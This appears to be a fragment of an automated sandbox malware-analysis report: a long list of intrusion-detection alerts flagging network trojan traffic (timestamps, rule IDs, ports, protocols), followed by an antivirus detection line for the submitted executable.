        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:50.148608
        SID:2804830
        Source Port:49940
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:26.728282
        SID:2804830
        Source Port:49990
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:19.462964
        SID:2804830
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:13.551847
        SID:2804830
        Source Port:49889
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:17.963435
        SID:2804830
        Source Port:49978
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:09.303762
        SID:2804830
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:30.032193
        SID:2804830
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:35.317999
        SID:2804830
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:49.164275
        SID:2804830
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:31.659976
        SID:2804830
        Source Port:49997
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:34.820235
        SID:2804830
        Source Port:49918
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:58.814550
        SID:2804830
        Source Port:63853
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:06.666109
        SID:2804830
        Source Port:49962
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:40.362555
        SID:2804830
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:19.958289
        SID:2804830
        Source Port:49981
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:38.467559
        SID:2804830
        Source Port:50006
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:24.299488
        SID:2804830
        Source Port:49987
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:53.128186
        SID:2804830
        Source Port:49944
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:43.840428
        SID:2804830
        Source Port:49850
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:32.384198
        SID:2804830
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:11.461784
        SID:2804830
        Source Port:49969
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:27.487510
        SID:2804830
        Source Port:49991
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:28.298626
        SID:2804830
        Source Port:49909
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:39.796014
        SID:2804830
        Source Port:49925
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:54.752862
        SID:2804830
        Source Port:49864
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:59.487756
        SID:2804830
        Source Port:49870
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:35.614319
        SID:2804830
        Source Port:49919
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:51.063459
        SID:2804830
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:50.247950
        SID:2804830
        Source Port:49858
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:42.749015
        SID:2804830
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:33.587885
        SID:2804830
        Source Port:50000
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:57.818703
        SID:2804830
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:54.953451
        SID:2804830
        Source Port:50029
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:38.250500
        SID:2804830
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:19.573920
        SID:2804830
        Source Port:49898
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:25.151668
        SID:2804830
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:36.683929
        SID:2804830
        Source Port:49921
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:27.230078
        SID:2804830
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:43.954296
        SID:2804830
        Source Port:49931
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:32.479378
        SID:2804830
        Source Port:49915
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:53.161826
        SID:2804830
        Source Port:50026
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:59.943341
        SID:2804830
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:56.772122
        SID:2807908
        Source Port:49706
        Destination Port:799
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:18.242450
        SID:2804830
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:56.566151
        SID:2838522
        Source Port:64650
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:12.970119
        SID:2804830
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:04.022066
        SID:2804830
        Source Port:49715
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:03.152790
        SID:2804830
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:47.290355
        SID:2804830
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:16.152288
        SID:2804830
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:20.999936
        SID:2804830
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:22.866675
        SID:2804830
        Source Port:49823
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:32.227759
        SID:2804830
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:29.573817
        SID:2804830
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:14.792678
        SID:2804830
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:56.506243
        SID:2804830
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:43.122012
        SID:2804830
        Source Port:49849
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:12.187330
        SID:2804830
        Source Port:49970
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:31.881537
        SID:2804830
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:46.468983
        SID:2804830
        Source Port:49853
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:17.914842
        SID:2804830
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:31.349246
        SID:2804830
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:10.546095
        SID:2804830
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:56.645638
        SID:2804830
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:44.740868
        SID:2804830
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:37.226377
        SID:2804830
        Source Port:50004
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:21.234782
        SID:2804830
        Source Port:49900
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:00.275363
        SID:2804830
        Source Port:49871
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:50.302773
        SID:2804830
        Source Port:50022
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:07.791091
        SID:2804830
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:58.613467
        SID:2804830
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:58.540036
        SID:2804830
        Source Port:49952
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:05.352632
        SID:2804830
        Source Port:49719
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:45.815743
        SID:2804830
        Source Port:49934
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:03.001623
        SID:2804830
        Source Port:49957
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:53.166032
        SID:2804830
        Source Port:49862
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:38.741816
        SID:2804830
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:10.370214
        SID:2804830
        Source Port:49885
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:48.869334
        SID:2804830
        Source Port:49938
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:39.564643
        SID:2804830
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:13.080098
        SID:2804830
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:49.406963
        SID:2804830
        Source Port:49939
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:02.183154
        SID:2804830
        Source Port:49956
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:06.146884
        SID:2804830
        Source Port:49961
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:22.519683
        SID:2804830
        Source Port:49984
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:06.776659
        SID:2804830
        Source Port:49880
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:18.335947
        SID:2804830
        Source Port:49896
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:15.590938
        SID:2804830
        Source Port:49975
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:09.581772
        SID:2804830
        Source Port:49966
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:56.042930
        SID:2804830
        Source Port:49948
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:06.807493
        SID:2804830
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:52.887573
        SID:2804830
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:12.789479
        SID:2804830
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:28.559508
        SID:2804830
        Source Port:49993
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:35.314816
        SID:2804830
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:05.551264
        SID:2804830
        Source Port:49878
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:47.376297
        SID:2804830
        Source Port:50018
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:25.987014
        SID:2804830
        Source Port:49827
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:48.377470
        SID:2804830
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:11.167101
        SID:2804830
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:12.546374
        SID:2804830
        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:02.576487
        SID:2804830
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:15.074571
        SID:2804830
        Source Port:49974
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:04.108659
        SID:2804830
        Source Port:49876
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:05.518067
        SID:2804830
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:42.573580
        SID:2804830
        Source Port:49848
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:28.356615
        SID:2804830
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:00.629569
        SID:2804830
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:52.521010
        SID:2804830
        Source Port:49943
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:13.592690
        SID:2804830
        Source Port:49731
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:40.829133
        SID:2804830
        Source Port:49927
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:15.362152
        SID:2804830
        Source Port:49892
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:10.909966
        SID:2804830
        Source Port:49968
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:30.908000
        SID:2804830
        Source Port:49996
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:39.258809
        SID:2804830
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:06.642554
        SID:2804830
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:31.435892
        SID:2804830
        Source Port:49913
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:27.247834
        SID:2804830
        Source Port:49907
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:17.395350
        SID:2804830
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:30.739816
        SID:2804830
        Source Port:49833
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:53.970856
        SID:2804830
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:11.730487
        SID:2804830
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:44.692074
        SID:2804830
        Source Port:50014
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:53.907746
        SID:2804830
        Source Port:50027
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:04.401245
        SID:2804830
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:49.030504
        SID:2804830
        Source Port:50020
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:22.352420
        SID:2804830
        Source Port:49822
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:50.812236
        SID:2804830
        Source Port:50023
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:47.525990
        SID:2804830
        Source Port:49936
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:28.891998
        SID:2804830
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:15.707666
        SID:2804830
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:43.526164
        SID:2804830
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:20.908103
        SID:2804830
        Source Port:49982
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:27.765764
        SID:2804830
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:07.966069
        SID:2804830
        Source Port:49964
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:34.792355
        SID:2804830
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:47.730064
        SID:2804830
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:41.811933
        SID:2804830
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:47.824068
        SID:2804830
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:58.522881
        SID:2804830
        Source Port:49707
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:09.128119
        SID:2804830
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:01.719700
        SID:2804830
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:55.485808
        SID:2804830
        Source Port:49865
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:59.328359
        SID:2804830
        Source Port:63854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:14.554537
        SID:2804830
        Source Port:49973
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:56.135964
        SID:2804830
        Source Port:49866
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:48.516871
        SID:2804830
        Source Port:49856
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:07.169793
        SID:2804830
        Source Port:49963
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:53.629266
        SID:2804830
        Source Port:49945
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:01.474125
        SID:2804830
        Source Port:49955
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:29.271010
        SID:2804830
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:02.055632
        SID:2804830
        Source Port:49874
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:40.865486
        SID:2804830
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:37.439073
        SID:2804830
        Source Port:49922
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:10.581201
        SID:2804830
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:18.862590
        SID:2804830
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:36.115894
        SID:2804830
        Source Port:49920
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:00.866418
        SID:2037771
        Source Port:80
        Destination Port:49711
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:35.879831
        SID:2804830
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:23.798397
        SID:2804830
        Source Port:49904
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:16.967869
        SID:2804830
        Source Port:49894
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:27.764798
        SID:2804830
        Source Port:49908
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:09.855835
        SID:2804830
        Source Port:49884
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:40.317801
        SID:2804830
        Source Port:49926
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:34.578408
        SID:2804830
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:00.742929
        SID:2804830
        Source Port:49954
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:34.184065
        SID:2804830
        Source Port:49837
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:33.065990
        SID:2804830
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:51.558103
        SID:2804830
        Source Port:50024
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:23.796248
        SID:2804830
        Source Port:49986
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:55.640261
        SID:2804830
        Source Port:50030
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:08.741808
        SID:2804830
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:28.048137
        SID:2804830
        Source Port:49992
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:14.259539
        SID:2804830
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:09.991240
        SID:2804830
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:22.011379
        SID:2804830
        Source Port:49901
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:27.008203
        SID:2804830
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:33.160392
        SID:2804830
        Source Port:49916
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:03.667336
        SID:2804830
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:04.788881
        SID:2804830
        Source Port:49717
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:45.455182
        SID:2804830
        Source Port:50015
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:27.958118
        SID:2804830
        Source Port:49830
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:24.626884
        SID:2804830
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:59.520486
        SID:2804830
        Source Port:49710
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:18.766398
        SID:2804830
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:41.302467
        SID:2804830
        Source Port:50009
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:23.402046
        SID:2804830
        Source Port:49824
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:21.557942
        SID:2804830
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:35.628594
        SID:2804830
        Source Port:50002
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:59.156855
        SID:2804830
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:21.587514
        SID:2804830
        Source Port:49821
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:54.711893
        SID:2804830
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:42.388055
        SID:2804830
        Source Port:50011
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:49.788119
        SID:2804830
        Source Port:50021
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:37.731319
        SID:2804830
        Source Port:50005
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:16.892207
        SID:2804830
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:26.526857
        SID:2804830
        Source Port:49828
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:20.454312
        SID:2804830
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeAvira: detected
